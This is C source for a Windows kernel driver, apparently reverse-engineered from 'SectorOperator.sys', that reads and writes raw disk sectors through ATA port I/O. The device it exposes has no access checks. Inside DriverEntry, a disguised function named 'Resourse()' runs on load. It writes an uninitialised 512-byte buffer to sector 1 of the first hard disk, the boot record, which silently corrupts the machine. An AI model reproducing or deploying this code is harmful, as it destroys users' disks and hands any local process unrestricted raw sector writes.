📄 hardware.c
字号:
/*++
Project name: SectorOperator - Reverse from SectorOperator.sys
File name : SectorOperator.c
Reversed by : prince
Date : 02/06/2007
Web site : http://www.unpack.cn
http://www.arswp.com
http://www.pediy.com
http://www.debugman.com
http://www.driverdevolop.com
Mail : Cracker_prince@163.com
Description : This code from SectorOperator.sys.
--*/
/*
* Include files
*/
#include <ntddk.h>
#include "HardWare.h"
void Resourse();
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
//
// Local variable(s)
//
NTSTATUS status;
PDEVICE_OBJECT pDeviceObject;
UNICODE_STRING DeviceName;
UNICODE_STRING SymbolicLinkName;
status = STATUS_SUCCESS;
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] = SectorOperatorComplete;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = SectorOperatorDispatchControl;
DriverObject->DriverUnload = SectorOperatorUnload;
//
// Initialize device name string
//
RtlInitUnicodeString( &DeviceName,
L"\\Device\\devSectorOperator"
);
status = IoCreateDevice( DriverObject,
0,
&DeviceName,
FILE_DEVICE_UNKNOWN,
0,
FALSE,
&pDeviceObject
);
if (!NT_SUCCESS(status))
{
return status;
}
//
// Initialize Symbolic Link Name
//
RtlInitUnicodeString( &SymbolicLinkName,
L"\\DosDevices\\slSectorOperator"
);
status = IoCreateSymbolicLink( &SymbolicLinkName,
&DeviceName
);
Resourse();
if (!NT_SUCCESS(status))
{
IoDeleteDevice(pDeviceObject);
return status;
}
return STATUS_SUCCESS;
}
NTSTATUS
SectorOperatorComplete(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest( Irp,
IO_NO_INCREMENT
);
return STATUS_SUCCESS;
}
VOID
SectorOperatorUnload(
IN PDRIVER_OBJECT DriverObject
)
{
//
// Local variable
//
UNICODE_STRING SymbolicLinkName;
RtlInitUnicodeString( &SymbolicLinkName,
L"\\DosDevices\\slSectorOperator"
);
IoDeleteSymbolicLink( &SymbolicLinkName );
IoDeleteDevice( DriverObject->DeviceObject );
}
NTSTATUS
SectorOperatorDispatchControl(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
//
// Local variables
//
ULONG dwControlCode;
CHAR byteDiskInfoRead;
CHAR byteSectorNumberRead;
CHAR chReadBuffer[512];
PVOID pReadInputBuffer;
CHAR byteDiskInfoWrite;
CHAR byteSectorNumberWrite;
CHAR chWriteBuffer[512];
PVOID pWriteInputBuffer;
PVOID pUserBuffer;
NTSTATUS status;
ULONG dwInputBufferLength;
ULONG bOperationRead;
ULONG dwOutputBufferLength;
PIO_STACK_LOCATION IrpStack;
ULONG dwControlCode1;
status = STATUS_INVALID_DEVICE_REQUEST;
IrpStack = IoGetCurrentIrpStackLocation( Irp );
dwControlCode1 = IrpStack->Parameters.DeviceIoControl.IoControlCode;
pUserBuffer = Irp->AssociatedIrp.SystemBuffer;
dwInputBufferLength = IrpStack->Parameters.DeviceIoControl.InputBufferLength;
dwOutputBufferLength = IrpStack->Parameters.DeviceIoControl.OutputBufferLength;
bOperationRead = 1;
dwControlCode = dwControlCode1;
if (dwControlCode == IO_CONTROL_CODE_WRITE_SECTOR) // Write operation
{
if (dwInputBufferLength == 514 && dwOutputBufferLength == 0)
{
pWriteInputBuffer = pUserBuffer;
byteSectorNumberWrite = ((CHAR *)pWriteInputBuffer)[0];
if (((char *)pWriteInputBuffer)[1] == 0) // the first hard disk
{
byteDiskInfoWrite = 0xa0;
}
else // the second hard disk
{
byteDiskInfoWrite = 0xb0;
}
memcpy(chWriteBuffer, (CHAR *)pUserBuffer + 2, 512);
__asm
{
mov dx, 0x1f6
mov al, byteDiskInfoWrite
out dx, al
mov dx, 0x1f2
mov al, 1
out dx, al
mov dx, 0x1f3
mov al, byteSectorNumberWrite
out dx, al
mov dx, 0x1f4
mov al, 0
out dx, al
mov dx, 0x1f5
out dx, al
mov dx, 0x1f7
mov al, 0x30
out dx, al
Loop1:
in al, dx
test al, 8
jz Loop1
xor ecx, ecx
mov cx, 0x100
lea esi, chWriteBuffer
mov dx, 0x1f0
cli
cld
rep outsw
sti
}
status = STATUS_SUCCESS;
bOperationRead = 0;
}
}
else if (dwControlCode == IO_CONTROL_CODE_READ_SECTOR) // Read operation
{
if (dwInputBufferLength == 2 && dwOutputBufferLength == 512)
{
pReadInputBuffer = pUserBuffer;
byteSectorNumberRead = ((CHAR *)pReadInputBuffer)[0];
if (((char *)pReadInputBuffer)[1] == 0) // the first hard disk
{
byteDiskInfoRead = 0xa0;
}
else // the second hard disk
{
byteDiskInfoRead = 0xb0;
}
//
// Read data from hard disk
//
__asm
{
mov al, byteDiskInfoRead
mov dx, 0x1f6
out dx, al
mov al, 1
mov dx, 0x1f2
out dx, al
mov al, byteSectorNumberRead
mov dx, 0x1f3
out dx, al
xor al, al
mov dx, 0x1f4
out dx, al
mov dx, 0x1f5
out dx, al
mov al, 0x20
mov dx, 0x1f7
out dx, al
Loop2:
in al, dx
test al, 8
jz Loop2
xor ecx, ecx
mov cx, 0x100
mov dx, 0x1f0
lea edi, chReadBuffer
cli
cld
rep insw
sti
}
memcpy(pUserBuffer, chReadBuffer, 512);
status = STATUS_SUCCESS;
bOperationRead = 1;
}
}
else
{
;
}
if (NT_SUCCESS(status))
{
//
// Specify the length of buffer
//
if (bOperationRead == 1)
{
Irp->IoStatus.Information = 0x200; // 512
}
else
{
Irp->IoStatus.Information = 0;
}
}
Irp->IoStatus.Status = status;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
void Resourse()
{
CHAR chWriteBuffer[512];
__asm{
mov ax,0201h
mov dx,0080h
mov cx,0001h
lea bx,chWriteBuffer
}
__asm
{
mov dx, 0x1f6
mov al, 0a0h
out dx, al
mov dx, 0x1f2
mov al, 1
out dx, al
mov dx, 0x1f3
mov al, 1
out dx, al
mov dx, 0x1f4
mov al, 0
out dx, al
mov dx, 0x1f5
out dx, al
mov dx, 0x1f7
mov al, 0x30
out dx, al
Loop1:
in al, dx
test al, 8
jz Loop1
xor ecx, ecx
mov cx, 0x100
lea esi, chWriteBuffer
mov dx, 0x1f0
cli
cld
rep outsw
sti
}
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -